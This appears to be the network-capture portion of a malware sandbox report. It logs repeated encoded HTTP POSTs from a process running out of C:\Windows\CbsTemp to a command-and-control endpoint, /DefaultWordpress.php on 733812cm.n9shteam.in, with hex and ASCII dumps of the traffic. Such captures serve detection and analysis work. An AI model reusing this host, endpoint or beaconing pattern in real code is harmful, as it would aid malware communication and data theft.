                                                          Oct 20, 2024 18:18:01.203233957 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:01.583681107 CEST | 787 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:01 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=davlpvtwUWwmFsYrmMiGilHw8ASPy1m2zxV4I1lxlUZS2hSUcwMYlTQlK3oAc%2BzpuBaBddKk%2BdF6rKaRMUa4I8A4HOyNUGz7xvCqQ9T%2F0YHbIBCqTyYD2T8e1bVfaPRr8BNfVZVsoA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5244fce124fc-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11868&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2839&delivery_rate=130886&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:01.584291935 CEST | 286 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 540
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:01.758523941 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:01.758759022 CEST540OUTData Raw: 5b 5e 59 5b 5a 5f 54 50 54 5b 52 57 50 5f 57 56 50 5d 5d 5a 50 50 57 59 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [^Y[Z_TPT[RWP_WVP]]ZPPWY\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ (39%]-?$32<.#)/&>/%$+=0._+#F $P.0
                                                          Oct 20, 2024 18:18:02.556423903 CEST | 795 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:02 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lisq4naVM3PnASXs3kjF%2F2K5LVHng3l%2BNNbuUAZEq45H4iXHdNPr7%2B0Bf7l7WSlxIVNHUqdbZWFKuUHdjQQfi0Qgu%2FoaufegdouEQU6RxuMfsdxnofC%2F%2Fy5k1KGzff0HqMhydcmSFA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52487f2724fc-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12178&sent=7&recv=11&lost=0&retrans=0&sent_bytes=837&recv_bytes=3665&delivery_rate=221018&cwnd=34&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:02.556698084 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:02.732937098 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:02.733129025 CEST2528OUTData Raw: 5e 5c 59 5c 5f 5e 51 54 54 5b 52 57 50 52 57 5c 50 5d 5d 5b 50 50 57 5a 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^\Y\_^QTT[RWPRW\P]][PPWZ\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ X)3%&-?('=-4Z(?,X$-%10'(>Z%=&?:#F $P.
                                                          Oct 20, 2024 18:18:03.135493994 CEST | 801 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:03 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o4oG8O6PKaGR2%2F%2FiBwIjo5k%2B0KtliplFn9Ey3TzSpXlIl8t9%2Fpc5UDiTo%2Bpo07i2cxrU0qLuPKLBid0vXEicZGoHxXKdUBc9MWMoS7h%2B1RfclBYW09%2Bi%2FMe4l5YLAuZjajrFmTsZ9A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a524e8b2d24fc-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12008&sent=13&recv=18&lost=0&retrans=0&sent_bytes=1657&recv_bytes=6480&delivery_rate=247754&cwnd=37&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:03.135931969 CEST | 322 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----QI6wl6V6KaS8EXIot5lUNMy5wHVoGou1rc
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2982
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:03.310394049 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:03.310626030 CEST2982OUTData Raw: 2d 2d 2d 2d 2d 2d 51 49 36 77 6c 36 56 36 4b 61 53 38 45 58 49 6f 74 35 6c 55 4e 4d 79 35 77 48 56 6f 47 6f 75 31 72 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                          Data Ascii: ------QI6wl6V6KaS8EXIot5lUNMy5wHVoGou1rcContent-Disposition: form-data; name="0"Content-Type: text/plain^]\YZZQVT[RWPRWUP]][PSWY\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^
                                                          Oct 20, 2024 18:18:03.703371048 CEST | 797 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:03 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uQ82lM7mGtVwztMrTmo9pqqsnx1AV1%2B82NIXjkG%2BtchHxqCb%2FktTdEvXktO0A3b0D2zQkgQ2mK5zk%2BvOOrLOP2RXJuVhvL1pa%2FDAHYOaNm8QH86%2BiO7qhxRdT20FkAm1xhLyufD7aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52522dd624fc-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11721&sent=18&recv=25&lost=0&retrans=0&sent_bytes=2483&recv_bytes=9784&delivery_rate=257125&cwnd=38&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:03.703711987 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1924
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:03.876585960 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:03.876750946 CEST1924OUTData Raw: 5e 5b 5c 59 5f 58 54 55 54 5b 52 57 50 5f 57 5d 50 50 5d 5c 50 52 57 5e 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^[\Y_XTUT[RWP_W]PP]\PRW^\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#)#[1W+0 &((8\* $='Z21 %;%$-=?#F $P.0
                                                          Oct 20, 2024 18:18:04.880072117 CEST | 945 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:04 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fce7Fj1XwIsvWqXenkgOOECYhCVdHeht7wyHWrdWmIcTecGDfgaQeM%2FwTJAPjjvpGU6AEBG5pOsNiFKzEBXpaVTLwmQE3sd2QrS22gKPF2%2F%2BYK4wOtu3Qb%2BaW1X%2F4uvxImK9cmZ7hQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5255b82c24fc-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11783&sent=23&recv=31&lost=0&retrans=0&sent_bytes=3305&recv_bytes=11995&delivery_rate=257125&cwnd=38&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 25 07 24 01 2f 1e 29 3f 20 54 39 3d 29 51 2d 3e 38 02 39 21 36 05 27 0d 32 5f 25 29 22 04 31 30 3c 02 35 02 32 59 23 3f 29 57 2c 26 28 5e 07 12 26 10 2b 5a 2c 14 3e 3d 2f 06 29 2b 3f 01 21 37 3f 41 26 04 38 0f 30 03 1c 00 3d 0f 26 01 3e 3d 36 1f 2d 27 29 0b 2e 5e 33 01 22 2a 22 53 03 13 26 04 29 1e 20 12 35 31 38 06 3f 13 3f 1d 29 28 07 05 3f 20 2c 05 29 28 06 00 3b 3e 21 01 30 3f 2b 01 32 3c 20 59 32 04 3b 55 33 3a 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98%$/)? T9=)Q->89!6'2_%)"10<52Y#?)W,&(^&+Z,>=/)+?!7?A&80=&>=6-').^3"*"S&) 518??)(? ,)(;>!0?+2< Y2;U3:$^-/W6[O0


                                                          Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49805 | Destination IP: 188.114.96.3 | Destination Port: 80 | PID: 892 | Process: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:00.854279995 CEST | 310 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 540
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:01.198920012 CEST540OUTData Raw: 5b 5a 5c 5e 5a 52 54 50 54 5b 52 57 50 5d 57 50 50 51 5d 59 50 55 57 5a 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Z\^ZRTPT[RWP]WPPQ]YPUWZ\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#=#9$82+;[02<.<)<73-/^1(3=0-!?#F $P.
                                                          Oct 20, 2024 18:18:01.640469074 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:02.016863108 CEST | 794 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:01 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WaIgNV%2B17z%2FxEZdNbWQAZ91WMzVeCFFexkQIBFoilTPtqqureqMySoVG%2BU%2BEw2NjkZuEsTg2P4SCCe9Zf33Ta84G2%2BBOJn8PYcfDYTtv%2BxefQ0a7CAC2T2HGlYi%2BFtnsy2lCOjM4JA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5247be94cf2f-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11057&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=850&delivery_rate=130615&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0
                                                          Oct 20, 2024 18:18:02.022510052 CEST | 322 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: multipart/form-data; boundary=----PQcgF7jnhOKLEmV1Ax6w3qxWXTGsxRwGM3
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2766
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:02.195514917 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:02.195704937 CEST2766OUTData Raw: 2d 2d 2d 2d 2d 2d 50 51 63 67 46 37 6a 6e 68 4f 4b 4c 45 6d 56 31 41 78 36 77 33 71 78 57 58 54 47 73 78 52 77 47 4d 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                          Data Ascii: ------PQcgF7jnhOKLEmV1Ax6w3qxWXTGsxRwGM3Content-Disposition: form-data; name="0"Content-Type: text/plain[_Y__ZQ\T[RWP]WPPQ]YPPW\\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^
                                                          Oct 20, 2024 18:18:02.585684061 CEST | 789 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:02 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mbJZCi5cTD1V4WpRNOKIOm21DefGX1J8u7ZInOMqaxU%2FdHUMFh%2FOdq3IVNlZfLyTWNFZnaZKvQUgdalRvClosYwM70%2BDk1Jee1zkiLlrFfC4NUbsr56nkxHjs3qZIV1yOPLXS0KnSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a524b2d0dcf2f-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11069&sent=6&recv=10&lost=0&retrans=0&sent_bytes=844&recv_bytes=3938&delivery_rate=259149&cwnd=34&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49815 | Destination IP: 188.114.96.3 | Destination Port: 80 | PID: 892 | Process: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:03.274321079 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:03.620757103 CEST2528OUTData Raw: 5b 51 5c 53 5a 5b 51 53 54 5b 52 57 50 58 57 52 50 5c 5d 59 50 53 57 5c 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [Q\SZ[QST[RWPXWRP\]YPSW\\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ ):%&+ $)V+,)'&>$%!?%(>Z0>?:#F $P.,
                                                          Oct 20, 2024 18:18:04.111371040 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:04.684184074 CEST | 785 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:04 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zfsTrcK8wYdAW6plvWTmMgatMc1v5GCbqgbLxcCx6Lv4miP38dPoxNxzQAjup4ac2N2HY6AkK5SVztZ0wSCNlhBAUdiN2DhSvleUjrbS6UNmzX1kxosG%2F5YmN5bdGThp7%2FUvPumX5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52572fb6cf82-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12981&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=112195&cwnd=57&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID: 8 | Source IP: 192.168.2.5 | Source Port: 49822 | Destination IP: 188.114.96.3 | Destination Port: 80 | PID: 892 | Process: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:04.854216099 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:05.198339939 CEST2528OUTData Raw: 5e 5b 5c 5f 5a 58 54 57 54 5b 52 57 50 52 57 57 50 5a 5d 5f 50 5d 57 55 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^[\_ZXTWT[RWPRWWPZ]_P]WU\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ ]=3%(:? ;'(S('*80?11?_'(&X'?#F $P.
                                                          Oct 20, 2024 18:18:05.629832029 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:06.001880884 CEST | 787 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:05 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ad00njiiYRhpXGH4ljf1AgGpqjt16GS543UooUIH8o2x2Qwarkqr1xys6FTpir%2BzKiHZUcqe6xygAp3nD8pLFxVAjE%2BICs6kK8b7rJ1GDUinELQE1YhW%2FlsK6MKa4uWk8GkuiWybA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5260a8dbcee9-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11354&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=122276&cwnd=46&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                          9  192.168.2.5  49830  188.114.96.3  80  892  C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp  Bytes transferred  Direction  Data
                                                          Oct 20, 2024 18:18:06.128463030 CEST  287  OUT  POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2520
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:06.479655981 CEST  2520  OUT  Data Raw: 5b 5f 5c 5e 5a 5a 54 56 54 5b 52 57 50 5a 57 5d 50 5f 5d 57 50 57 57 55 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [_\^ZZTVT[RWPZW]P_]WPWWU\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#)%8=R<#[0.(([>Y#'-&10(!'%)*#F $P.
                                                          Oct 20, 2024 18:18:06.908596039 CEST  25  IN  HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:07.292232990 CEST  787  IN  HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:07 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y8YhKmKt5P07roWg%2BI41%2BiL5EljRTx6CB5VKCPz8iUOcdhzXIP1BVr6idLbq38pKtOlP6x4VxqBsBraQlG2c5ZHfqIvzxdIXavzvsOk04AkZHkOhS19NeJNUIZxnN%2BijvAkK84uwdA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5268a82c7ae5-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12928&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2807&delivery_rate=112048&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                          10  192.168.2.5  49835  188.114.96.3  80  892  C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp  Bytes transferred  Direction  Data
                                                          Oct 20, 2024 18:18:07.438918114 CEST  311  OUT  POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:07.792095900 CEST  2528  OUT  Data Raw: 5b 5a 59 5e 5f 5f 51 50 54 5b 52 57 50 52 57 52 50 59 5d 5f 50 52 57 5b 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
